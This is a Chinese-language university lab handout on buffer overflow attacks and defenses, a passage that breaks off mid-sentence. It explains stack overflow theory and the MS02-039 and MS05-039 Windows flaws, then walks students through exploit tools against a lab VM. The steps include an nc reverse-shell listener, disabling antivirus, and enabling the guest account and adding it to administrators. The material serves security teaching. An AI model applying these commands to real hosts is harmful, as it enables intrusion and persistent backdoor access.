緩沖區(qū)溢出攻擊與防范實驗

1、實驗十二 緩沖區(qū)溢出攻擊與防范實驗1.實驗?zāi)康耐ㄟ^實驗掌握緩沖區(qū)溢出的原理；通過使用緩沖區(qū)溢出攻擊軟件模擬入侵遠程主機；理解緩沖區(qū)溢出危險性；理解防范和避免緩沖區(qū)溢出攻擊的措施。2.預(yù)備知識2.1緩沖區(qū)溢出攻擊簡介緩沖區(qū)溢出攻擊之所以成為一種常見的攻擊手段，其原因在于緩沖區(qū)溢出漏洞太普通了，并且易于實現(xiàn)。而且，緩沖區(qū)溢出所以成為遠程攻擊的主要手段，其原因在于緩沖區(qū)溢出漏洞給予了攻擊者所想要的一切：植入并且執(zhí)行攻擊代碼。被植入的攻擊代碼以一定的權(quán)限運行有緩沖區(qū)溢出漏洞的程序，從而得到被攻擊主機的控制權(quán)。下面簡單介紹緩沖區(qū)溢出的基本原理和預(yù)防辦法。（1）緩沖區(qū)概念緩沖區(qū)是內(nèi)存中存放數(shù)據(jù)的地方。在程

2、序試圖將數(shù)據(jù)放到機器內(nèi)存中的某一個位置的時候，因為沒有足夠的空間就會發(fā)生緩沖區(qū)溢出。而人為的溢出則是有一定企圖的，攻擊者寫一個超過緩沖區(qū)長度的字符串，植入到緩沖區(qū)，然后再向一個有限空間的緩沖區(qū)中植入超長的字符串，這時可能會出現(xiàn)兩個結(jié)果：一是過長的字符串覆蓋了相鄰的存儲單元，引起程序運行失敗，嚴重的可導(dǎo)致系統(tǒng)崩潰；另一個結(jié)果就是利用這種漏洞可以執(zhí)行任意指令，甚至可以取得系統(tǒng)root特級權(quán)限。緩沖區(qū)是程序運行的時候機器內(nèi)存中的一個連續(xù)塊，它保存了給定類型的數(shù)據(jù)，隨著動態(tài)分配變量會出現(xiàn)問題。大多時為了不占用太多的內(nèi)存，一個有動態(tài)分配變量的程序在程序運行時才決定給它們分配多少內(nèi)存。如果程序在動態(tài)分配緩

3、沖區(qū)放入超長的數(shù)據(jù)，它就會溢出了。一個緩沖區(qū)溢出程序使用這個溢出的數(shù)據(jù)將匯編語言代碼放到機器的內(nèi)存里，通常是產(chǎn)生root權(quán)限的地方。僅僅單個的緩沖區(qū)溢出并不是問題的根本所在。但如果溢出送到能夠以root權(quán)限運行命令的區(qū)域，一旦運行這些命令，那可就等于把機器拱手相讓了。造成緩沖區(qū)溢出的原因是程序中沒有仔細檢查用戶輸入的參數(shù)。緩沖區(qū)是一塊用于存放數(shù)據(jù)的臨時內(nèi)存空間，它的長度事先已經(jīng)被程序或操作系統(tǒng)定義好。緩沖區(qū)類似于一個杯子，寫入的數(shù)據(jù)類似于倒入的水。緩沖區(qū)溢出就是將長度超過緩沖區(qū)大小的數(shù)據(jù)寫入程序的緩沖區(qū)，造成緩沖區(qū)的溢出，從而破壞程序的堆棧，使程序轉(zhuǎn)而執(zhí)行其他指令。發(fā)生溢出時，如果用一個實際存

4、在的指令地址來覆蓋被調(diào)用函數(shù)的返回地址，則系統(tǒng)就會轉(zhuǎn)而執(zhí)行這個指令，這一點就是緩沖區(qū)溢出被用來進行攻擊的最關(guān)鍵之處。（2）制造緩沖區(qū)溢出一個程序在內(nèi)存中通常分為程序段、數(shù)據(jù)段和堆棧三部分。程序段里放著程序的機器碼和只讀數(shù)據(jù)。數(shù)據(jù)段放的是程序中的靜態(tài)數(shù)據(jù)。動態(tài)數(shù)據(jù)則通過堆棧來存放。在內(nèi)存中，它們的位置由到高依次是： 內(nèi)存高端；堆棧；數(shù)據(jù)段；程序段；內(nèi)存低端。當程序中發(fā)生函數(shù)調(diào)用時，計算機做如下操作：首先把參數(shù)壓入堆棧；然后保存指令寄存器(IP)中的內(nèi)容作為返回地址(RET)；第三個放入堆棧的是基址寄存器(FP)；然后把當前的棧指針(SP)拷貝到FP，作為新的基地址；最后為本地變量留出一定空間，把

5、SP減去適當?shù)臄?shù)值。2.2緩沖區(qū)溢出漏洞攻擊方式緩沖區(qū)溢出漏洞可以使任何一個有黑客技術(shù)的人取得機器的控制權(quán)甚至是最高權(quán)限。一般利用緩沖區(qū)溢出漏洞攻擊root程序，大都通過執(zhí)行類似“exec(sh)”的執(zhí)行代碼來獲得root 的shell。黑客要達到目的通常要完成兩個任務(wù)，就是在程序的地址空間里安排適當?shù)拇a和通過適當?shù)某跏蓟拇嫫骱痛鎯ζ鳎尦绦蛱D(zhuǎn)到安排好的地址空間執(zhí)行。（1）在程序的地址空間里安排適當?shù)拇a在程序的地址空間里安排適當?shù)拇a往往是相對簡單的。如果要攻擊的代碼在所攻擊程序中已經(jīng)存在了，那么就簡單地對代碼傳遞一些參數(shù)，然后使程序跳轉(zhuǎn)到目標中就可以完成了。攻擊代碼要求執(zhí)行“exec

6、(/bin/sh)”，而在libc庫中的代碼執(zhí)行“exec(arg)”，其中的“arg”是個指向字符串的指針參數(shù)，只要把傳入的參數(shù)指針修改指向“/bin/sh”，然后再跳轉(zhuǎn)到libc庫中的響應(yīng)指令序列就可以了。當然，很多時候這個可能性是很小的，那么就得用一種叫“植入法”的方式來完成了。當向目標程序里輸入一個字符串時，程序就會把這個字符串放到緩沖區(qū)里，這個字符串包含的數(shù)據(jù)是可以在這個所攻擊的目標的硬件平臺上運行的指令序列。緩沖區(qū)可以設(shè)在：堆棧（自動變量）、堆（動態(tài)分配的）和靜態(tài)數(shù)據(jù)區(qū)（初始化或者未初始化的數(shù)據(jù)）等的任何地方。也可以不必為達到這個目的而溢出任何緩沖區(qū)，只要找到足夠的空間來放置這些攻

7、擊代碼就夠了。（2）控制程序轉(zhuǎn)移到攻擊代碼的形式緩沖區(qū)溢出漏洞攻擊都是在尋求改變程序的執(zhí)行流程，使它跳轉(zhuǎn)到攻擊代碼，最為基本的就是溢出一個沒有檢查或者其他漏洞的緩沖區(qū)，這樣做就會擾亂程序的正常執(zhí)行次序。通過溢出某緩沖區(qū)，可以改寫相近程序的空間而直接跳轉(zhuǎn)過系統(tǒng)對身份的驗證。原則上來講攻擊時所針對的緩沖區(qū)溢出的程序空間可為任意空間。但因不同地方的定位相異，所以也就帶出了多種轉(zhuǎn)移方式。 Function Pointers（函數(shù)指針）在程序中，“void (* foo) ( )”聲明了個返回值為“void” Function Pointers的變量“foo”。Function Pointers可以用來

8、定位任意地址空間，攻擊時只需要在任意空間里的Function Pointers鄰近處找到一個能夠溢出的緩沖區(qū)，然后用溢出來改變Function Pointers。當程序通過Function Pointers調(diào)用函數(shù)，程序的流程就會實現(xiàn)。Activation Records（激活記錄）當一個函數(shù)調(diào)用發(fā)生時，堆棧中會留駐一個Activation Records，它包含了函數(shù)結(jié)束時返回的地址。執(zhí)行溢出這些自動變量，使這個返回的地址指向攻擊代碼，再通過改變程序的返回地址。當函數(shù)調(diào)用結(jié)束時，程序就會跳轉(zhuǎn)到事先所設(shè)定的地址，而不是原來的地址。這樣的溢出方式也是較常見的。Longjmp buffers（長跳

9、轉(zhuǎn)緩沖區(qū)）在C語言中包含了一個簡單的檢驗/恢復(fù)系統(tǒng)，稱為“setjmp/longjmp”，意思是在檢驗點設(shè)定“setjmp(buffer)”，用longjmp(buffer)“來恢復(fù)檢驗點。如果攻擊時能夠進入緩沖區(qū)的空間，感覺“l(fā)ongjmp(buffer)”實際上是跳轉(zhuǎn)到攻擊的代碼。像Function Pointers一樣，longjmp緩沖區(qū)能夠指向任何地方，所以找到一個可供溢出的緩沖區(qū)是最先應(yīng)該做的事情。（3）植入綜合代碼和流程控制常見的溢出緩沖區(qū)攻擊類是在一個字符串里綜合了代碼植入和Activation Records。攻擊時定位在一個可供溢出的自動變量，然后向程序傳遞一個很大的字符串

10、，在引發(fā)緩沖區(qū)溢出改變Activation Records的同時植入代碼（權(quán)因C在習(xí)慣上只為用戶和參數(shù)開辟很小的緩沖區(qū)）。植入代碼和緩沖區(qū)溢出不一定要一次性完成，可以在一個緩沖區(qū)內(nèi)放置代碼（這個時候并不能溢出緩沖區(qū)），然后通過溢出另一個緩沖區(qū)來轉(zhuǎn)移程序的指針。這樣的方法一般是用于可供溢出的緩沖區(qū)不能放入全部代碼時的。如果想使用已經(jīng)駐留的代碼不需要再外部植入的時候，通常必須先把代碼作為參數(shù)。在libc（熟悉C的朋友應(yīng)該知道，現(xiàn)在幾乎所有的C程序連接都是利用它來連接的）中的一部分代碼段會執(zhí)行“exec(something)”，當中的something就是參數(shù)，使用緩沖區(qū)溢出改變程序的參數(shù)，然后利用

11、另一個緩沖區(qū)溢出使程序指針指向libc中的特定的代碼段。程序編寫的錯誤造成網(wǎng)絡(luò)的不安全性也應(yīng)當受到重視，因為它的不安全性已被緩沖區(qū)溢出表現(xiàn)得淋漓盡致了。2.3緩沖區(qū)溢出的保護方法目前有四種基本的方法保護緩沖區(qū)免受緩沖區(qū)溢出的攻擊和影響：（1）強制寫正確的代碼的方法編寫正確的代碼是一件非常有意義但耗時的工作，特別像編寫C語言那種具有容易出錯傾向的程序（如：字符串的零結(jié)尾），這種風格是由于追求性能而忽視正確性的傳統(tǒng)引起的。盡管花了很長的時間使得人們知道了如何編寫安全的程序，具有安全漏洞的程序依舊出現(xiàn)。因此人們開發(fā)了一些工具和技術(shù)來幫助經(jīng)驗不足的程序員編寫安全正確的程序。雖然這些工具幫助程序員開發(fā)更

12、安全的程序，但是由于C語言的特點，這些工具不可能找出所有的緩沖區(qū)溢出漏洞。所以，幀錯技術(shù)只能用來減少緩沖區(qū)溢出的可能，并不能完全地消除它的存在。除非程序員能保證他的程序萬無一失，否則還是要用到以下部分的內(nèi)容來保證程序的可靠性能。（2）通過操作系統(tǒng)使得緩沖區(qū)不可執(zhí)行，從而阻止攻擊者植入攻擊代碼。這種方法有效地阻止了很多緩沖區(qū)溢出的攻擊，但是攻擊者并不一定要植入攻擊代碼來實現(xiàn)緩沖區(qū)溢出的攻擊，所以這種方法還是存在很多弱點的。（3）利用編譯器的邊界檢查來實現(xiàn)緩沖區(qū)的保護這個方法使得緩沖區(qū)溢出不可能出現(xiàn)，從而完全消除了緩沖區(qū)溢出的威脅，但是相對而言代價比較大。 （4）在程序指針失效前進行完整性檢查 這

13、樣雖然這種方法不能使得所有的緩沖區(qū)溢出失效，但它的確阻止了絕大多數(shù)的緩沖區(qū)溢出攻擊，而能夠逃脫這種方法保護的緩沖區(qū)溢出也很難實現(xiàn)。最普通的緩沖區(qū)溢出形式是攻擊活動紀錄然后在堆棧中植入代碼。這種類型的攻擊在1996年中有很多紀錄。而非執(zhí)行堆棧和堆棧保護的方法都可以有效防衛(wèi)這種攻擊。非執(zhí)行堆?？梢苑佬l(wèi)所有把代碼殖入堆棧的攻擊方法，堆棧保護可以防衛(wèi)所有改變活動紀錄的方法。這兩種方法相互兼容，可以同時防衛(wèi)多種可能的攻擊。剩下的攻擊基本上可以用指針保護的方法來防衛(wèi)，但是在某些特殊的場合需要用手工來實現(xiàn)指針保護。全自動的指針保護需要對每個變量加入附加字節(jié)，這樣使得指針邊界檢查在某些情況下具有優(yōu)勢。最為有趣

14、的是，緩沖區(qū)溢出漏洞-Morris蠕蟲使用了現(xiàn)今所有方法都無法有效防衛(wèi)的方法，但是由于過于復(fù)雜的緣故卻很少有人用到。2.4 ms05-039漏洞原理MS05-039漏洞是Microsoft Windows即插即用功能遠程緩沖區(qū)溢出漏洞。Microsoft Windows即插即用（PnP）功能允許操作系統(tǒng)在安裝新硬件時能夠檢測到這些設(shè)備。Microsoft Windows即插即用功能中存在緩沖區(qū)溢出漏洞，造成該漏洞的原因是Plug and Play 服務(wù)中有未經(jīng)檢查的緩沖區(qū)。成功利用這個漏洞的攻擊者可以完全控制受影響的系統(tǒng)。 這是一個嚴重的安全漏洞，成功的攻擊者可以完全控制被攻擊的計算機。這個漏

15、洞既可以用來遠程溢出（只適用于目標系統(tǒng)是2000和xp sp1），也可以用來本地提升權(quán)限（2000以上版本都可以）。而且溢出成功后會得到一個SYSTEM權(quán)限的shell。2.5 MS02-039 漏洞原理Microsoft SQL Server 2000支持在單個物理主機上伺服多個SQL服務(wù)器的實例，每個實例操作需要通過單獨的服務(wù)，不過多個實例不能全部使用標準SQL服務(wù)會話會話端口(TCP 1433)，所以SQL Server Resolution服務(wù)操作監(jiān)聽在UDP 1434端口，提供一種使客戶端查詢適當?shù)木W(wǎng)絡(luò)末端用于特殊的SQL服務(wù)實例的途徑。當SQL Server Resolution服

16、務(wù)在UDP 1434端口接收到第一個字節(jié)設(shè)置為0x04的UDP包時，SQL監(jiān)視線程會獲取UDP包中的數(shù)據(jù)并使用此用戶提供的信息來嘗試打開注冊表中的某一鍵值，如發(fā)送x04x41x41x41x41類似的UDP包，SQL服務(wù)程序就會打開如下注冊表鍵：HKLMSoftwareMicrosoftMicrosoft SQL ServerAAAAMSSQLServerCurrentVersion 攻擊者可以通過在這個UDP包后追加大量字符串數(shù)據(jù)，當嘗試打開這個字符串相對應(yīng)的鍵值時，會發(fā)生基于棧的緩沖區(qū)溢出，通過包含"jmp esp"或者"call esp"指令的地址覆

17、蓋棧中保存的返回地址，可導(dǎo)致以SQL Server進程的權(quán)限在系統(tǒng)中執(zhí)行任意指令。3.實驗環(huán)境3.1 運行環(huán)境 1）預(yù)備知識要求l 了解網(wǎng)絡(luò)的基本知識；l 熟練使用windows操作系統(tǒng)；l 充分理解第2節(jié)“緩沖區(qū)溢出攻擊原理”。2）實驗環(huán)境 本實驗需要用到虛擬機，因此每臺實驗主機都通過安裝軟件WMware Workstation分割出了虛擬機。真實主機P1的配置為：操作系統(tǒng)Windows2000 Professional SP4或者windows XP sp2，并且安裝ms02-039.exe緩沖區(qū)溢出攻擊軟件和ms05-039.exe緩沖區(qū)溢出攻擊軟件。虛擬機P2配置為：操作系統(tǒng)Windo

18、ws2000 Server SP4（沒有另外打補丁，安裝了SQL Server 2000 sp2，存在MSSQL漏洞和ms05039漏洞）。3)實驗網(wǎng)絡(luò)拓撲圖圖4-1 實驗網(wǎng)絡(luò)拓撲圖4）請根據(jù)實驗環(huán)境在下表中填寫IP地址。攻防實驗服務(wù)器IPP1:本機IPP2:本機虛擬機IPP3:表4-1 實驗IP地址3.2 準備工作連接服務(wù)器，在地址欄中敲入URL：http:/P1, 進入實驗系統(tǒng)主頁面選擇“溢出實驗”。選擇需要下載的實驗工具，ms02-039和ms05-039。在真實機P2上分別下載ms02-039和ms05-039后請解壓縮，解壓前請關(guān)閉殺毒軟件的自動防護功能。解壓縮后可以發(fā)現(xiàn)工具仍然是一

19、個個的壓縮包，這是為了防止溢出程序被殺毒軟件刪除。我們需要將完全解壓后的ms05039.exe， ms02039.exe和nc.exe一起拷貝到C:gongfang的根目錄下，如圖42所示。圖4-2 將文件拷貝到C:gongfang啟動虛擬主機，具體操作如下：雙擊桌面上的虛擬機圖標，如圖43圖4-3 Vmware Workstation 虛擬機快捷方式圖標雙擊該圖標后虛擬機軟件開始運行，出現(xiàn)界面如圖4-4所示。圖4-4 虛擬機軟件運行頁面點擊“Open Existing Virtual Machine”圖標，跳出選擇界面如圖4-5所示，選擇虛擬機操作系統(tǒng)。選擇win2000Pro.vmx,點擊

20、“打開”。進入頁面如圖46所示，可見虛擬機所安裝的操作系統(tǒng)信息。圖4-5 選擇虛擬機操作系統(tǒng)頁面圖4-6 虛擬機操作系統(tǒng)信息頁面點擊“Start this virtual machine”，啟動該虛擬機。耐心等待虛擬機啟動，其啟動過程如同真實機的操作系統(tǒng)一樣。登錄虛擬機系統(tǒng)的密碼為“taigu”。登錄成功進入系統(tǒng)，如圖4-7所示。可通過同時按下“Ctrl+Alt”來切換真實機與虛擬機之間的鼠標定位。圖 4-7 虛擬機操作系統(tǒng)主頁面獲取虛擬主機系統(tǒng)的IP地址，依次操作：“開始”“運行”“敲入cmd”-“在命令行下敲入ipconfig”回車，如圖4-8所示，可知本機上虛擬機的IP地址。圖4-8 查

21、詢虛擬機IP地址準備工作結(jié)束，開始實驗。4.實驗內(nèi)容和步驟4.1 實驗任務(wù)一： MS02-039漏洞的利用本實驗要求利用MSSQL溢出工具對遠程主機上的Windows系統(tǒng)MSSQL 漏洞進行入侵攻擊，攻擊成功后可以獲得系統(tǒng)控制權(quán)。注：在本實驗中，遠程主機均指每臺學(xué)生實驗主機上安裝的虛擬機。1）熟悉ms02039.exe命令的使用 這是一個利用遠程主機MSSQL漏洞進行溢出攻擊的工具，它在命令行下使用，使用格式如下：ms02039.exe <目標主機IP> <溢出后反連IP> <反連端口> <目標主機mssql類型對應(yīng)的參數(shù)>其中，MSSQL版本類

22、型及對應(yīng)參數(shù)如下：SQL Server 2000 Service pack 00SQL Server 2000 Service pack 1、212）利用目標虛擬主機上的ms02039漏洞進行入侵(1)用nc.exe在本地進行監(jiān)聽端口99，如圖4-9所示：圖4-9 用nc.exe進行監(jiān)聽（2）使用ms02039.exe并進行溢出攻擊，并反連回本機的99端口，。假定虛擬機IP地址為50（實際實驗中以目標虛擬主機的IP地址為準）。在真實機上的命令行提示下輸入ms02039.exe工具的命令， “ms02039.exe 50 22 9

23、9 0”，（這表示對50進行遠程溢出，溢出后返回的ip是22（本機ip），返回端口是99，遠程主機mssql的類型是2000 sp0），如圖4-10所示。圖4-10 命令行下鍵入ms02039.exe的命令然后運行，可見我們的exploit已經(jīng)發(fā)向了目的主機，現(xiàn)在我們查看nc.exe程序有沒有反應(yīng)，結(jié)果發(fā)現(xiàn)：遠程主機向我們22主機的99端口進行了反連，溢出攻擊成功。結(jié)果如圖4-11：圖4-11 溢出成功后目的主機反連我們的主機（3）查看遠程主機上的用戶在反連得到的shell窗口下輸入net user 查看遠程主機下有哪些用戶。（

24、4）激活遠程主機的guest用戶發(fā)現(xiàn)遠程主機有g(shù)uest用戶，一般該用戶安全設(shè)置是關(guān)閉的，首先需要把它激活，如圖4-12，敲入net user guest/active:yes，顯示“命令成功完成”，表示遠程主機的guest用戶已經(jīng)被激活了。 圖4-12 命令行下鍵入net user guest命令（5）給guest用戶添加密碼，如“123”，如圖4-13：圖4-13 命令行下給用戶添加密碼“123”（6）把guest用戶添加到administrator組中，這樣用戶就擁有了很高的權(quán)限，如圖4-14：圖4-14 命令行下給用戶添加最高權(quán)限獲得最高權(quán)限后，請嘗試使用ftp命令上傳一個文件到目標主

25、機上。4.2 實驗任務(wù)二： ms05-039溢出漏洞利用本實驗需要在真實主機上利用ms05039溢出工具對虛擬機上的ms05039漏洞進行溢出攻擊，入侵成功可以獲得系統(tǒng)的控制權(quán)。1）入侵準備工作這是一個遠程執(zhí)行代碼和本地特權(quán)提升漏洞。在 Windows 2000 上，匿名攻擊者可能試圖遠程利用此漏洞。在 Windows XP Service Pack 1 上，只有經(jīng)身份驗證的用戶可試圖遠程利用此漏洞。 在 Window XP Service Pack 2 和 Windows Server 2003 上，只有管理員才能遠程訪問受影響的組件。成功利用此漏洞的攻擊者可完全控制受影響的系統(tǒng)。攻擊者可隨

26、后安裝程序，查看、更改或刪除數(shù)據(jù)，或者創(chuàng)建擁有完全用戶權(quán)限的新帳戶。（1）關(guān)閉本機（攻擊主機）上的殺毒軟件和防火墻軟件，確保實驗軟件能夠運行；（2）運行nc.exe。在本地進行監(jiān)聽：nc vv l p 99，如圖4-15。圖4-15 運行nc 進行監(jiān)聽2）對遠程主機進ms05-039漏洞進行入侵實驗在命令行下進行，具體操作如下：（1）運行ms05039scan.exe,如圖4-16，設(shè)定探測目標50（實驗中以實際虛擬機為準）。圖4-16 ms05039掃描（2）點擊“”按鈕；（3）運行結(jié)束后查看結(jié)果，此例中表明目標主機有該漏洞，可以進行下一步攻擊。3）攻擊（1）在dos下運行ms05039攻擊程序ms0539.exe。ms0539.exe是一個利用遠程主機ms05-039漏洞進行溢出的工具，它在命令行下使用，使用格式如下： ms05039.exe <host> <conIP> <conPort> target其中：host :目標主機地址conIP ：回連ip地址，一般就是本地主機ip地址onPort：回連端口，如該實驗中的“99”target ：目標系統(tǒng)類型，缺省